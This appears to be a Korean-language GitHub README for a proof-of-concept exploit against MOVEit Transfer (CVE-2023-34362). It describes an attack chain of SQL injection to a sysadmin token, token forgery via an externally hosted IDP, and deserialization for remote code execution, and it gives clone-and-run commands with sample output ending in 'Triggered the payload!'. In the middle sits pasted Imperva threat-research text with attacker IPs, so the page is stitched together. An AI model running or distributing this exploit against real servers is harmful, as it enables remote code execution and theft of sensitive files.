
MOVEit Transfer에 영향을 미치는 CVE-2023-34362에 대한 POC 익스플로잇
CVE-2023-34362에 영향을 받는 MOVEit Transfer에 대한 POC 익스플로잇
참고: 이 프로젝트는 완료되었습니다...
저희 인스타그램 페이지
.
저희 유튜브 채널
.
저희 트위터 페이지
CVE-2023-34362에 영향을 받는 MOVEit Transfer에 대한 POC
이 소프트웨어는 학술 연구 및 효과적인 방어 기술 개발 목적으로만 제작되었으며, 명시적으로 승인된 경우를 제외하고 시스템을 공격하는 용도로 사용되지 않습니다. 프로젝트 유지관리자는 소프트웨어의 오용에 대해 책임을 지지 않습니다. 책임감 있게 사용하십시오.
이 POC는 SQL 인젝션을 악용하여 sysadmin API 액세스 토큰을 획득한 후, 해당 액세스를 이용해 역직렬화 호출을 남용하여 원격 코드 실행을 유도합니다.
이 POC는 RS256 인증서를 호스팅하는 ID 공급자 엔드포인트에 접근해야 합니다. RS256 인증서는 임의의 사용자 토큰을 위조하는 데 사용됩니다. 기본적으로 이 POC는 AWS에 호스팅된 자체 IDP 엔드포인트를 사용합니다.
기본적으로 익스플로잇은 C:\Windows\Temp\message.txt 파일을 생성합니다. ysoserial.net 프로젝트를 사용하여 대체 페이로드를 생성할 수 있습니다.
MOVEit Transfer는 Progress(Ipswitch의 자회사)가 개발한 인기 있는 안전한 파일 전송 솔루션입니다. 현재 Shodan에 따르면 인터넷에서 접근 가능한 MOVEit Transfer 서버가 2,500개 이상 있습니다.

2023년 5월 31일, Progress는 버전 2021.0.6 (13.0.6), 2021.1.4 (13.1.4), 2022.0.4 (14.0.4), 2022.1.5 (14.1.5), 2023.0.1 (15.0.1)에 영향을 미치는 보안 권고를 발표했습니다.
이 취약점은 SQL 인젝션으로 분류되며, 인증되지 않은 사용자가 MOVEit 데이터베이스에 접근할 수 있게 하여 잠재적으로 임의 코드 실행 및 데이터 유출을 초래할 수 있습니다.
공격 체인은 관리자 자격 증명을 탈취하는 SQL 인젝션으로 시작되며, 이를 통해 공격자는 제한 없이 파일을 업로드하여 서버에 백도어를 설치할 수 있습니다.
2023년 6월 1일 금요일, CVE는 CISA의 알려진 악용 취약점 목록(KEV)에 추가되었으며, 이는 이 취약점이 심각하며 현재 실제 환경에서 악용되고 있음을 나타냅니다.
개념 증명(PoC)은 공개되지 않았습니다. 그러나 추가 조사 후 Imperva 위협 연구 팀은 이 취약점에 대한 효과적이고 전용된 완화 규칙을 만들어, 이미 공격을 탐지한 SQL 인젝션 공격에 대한 기존 내장 완화 조치를 강화했습니다. CVE-2023-34362는 Imperva Cloud WAF, WAF Gateway 및 RASP 모두에 의해 완화됩니다.
지난 며칠 동안 Imperva 위협 연구는 수천 건의 익스플로잇 시도를 관찰했으며, 모두 Imperva Cloud WAF 및 Imperva WAF Gateway(고객 관리 WAF)에 의해 성공적으로 차단되었습니다. 대부분의 익스플로잇 시도는 Python(requests 모듈 사용) 및 Bash(CURL 도구 사용)와 같은 다양한 스크립팅 언어로 작성된 자동화된 해킹 도구에 의해 수행되었습니다. 이 CVE의 주요 표적 산업은 금융 서비스 및 의료 분야입니다.
Imperva 위협 연구 팀은 다음 IP 주소에서 익스플로잇 시도를 관찰했습니다:
51[.]158[.]122[.]21
51[.]15[.]218[.]116
196[.]112[.]216[.]184
67[.]220[.]86[.]236
51[.]15[.]199[.]148
158[.]247[.]208[.]44
50[.]19[.]142[.]233
또한 이러한 IP는 Imperva IP 평판 메커니즘에 기반하여 높은 위험 점수를 가졌습니다. 이는 해당 IP가 최근 며칠 동안 악의적인 활동에 적극적으로 참여했음을 시사합니다.
항상 그렇듯, Imperva 위협 연구는 상황을 면밀히 모니터링하며 새로운 정보가 나오면 업데이트를 제공할 것입니다.

CVE-2023-34362에 영향을 받는 MOVEit Transfer에 대한 POC 익스플로잇
이 프로젝트의 주요 개발자는 저였지만, 이 프로젝트는 다음과 같은 오픈 소스 프로젝트의 도움 없이 시작될 수 없었습니다. 특별히 감사드립니다:
다음은 프로젝트를 로컬에서 설정하는 방법에 대한 예시입니다. 로컬 복사본을 실행하려면 다음 간단한 단계를 따르십시오.
이 프로그램에는 사전 요구 사항이 없습니다.
git clone https://github.com/errorfiathck/MOVEit-Exploit.git
cd MOVEit-Exploit
python3 CVE-2023-34362.py https://127.0.0.1
[*] Getting sysadmin access token
[*] Got access token
[*] Getting FolderID
[*] Got FolderID: 963611079
[*] Starting file upload
[*] Got FileID: 965943963
[*] Injecting the payload
[*] Payload injected
[*] Triggering payload via resume call
[+] Triggered the payload!
[*] Deleting uploaded file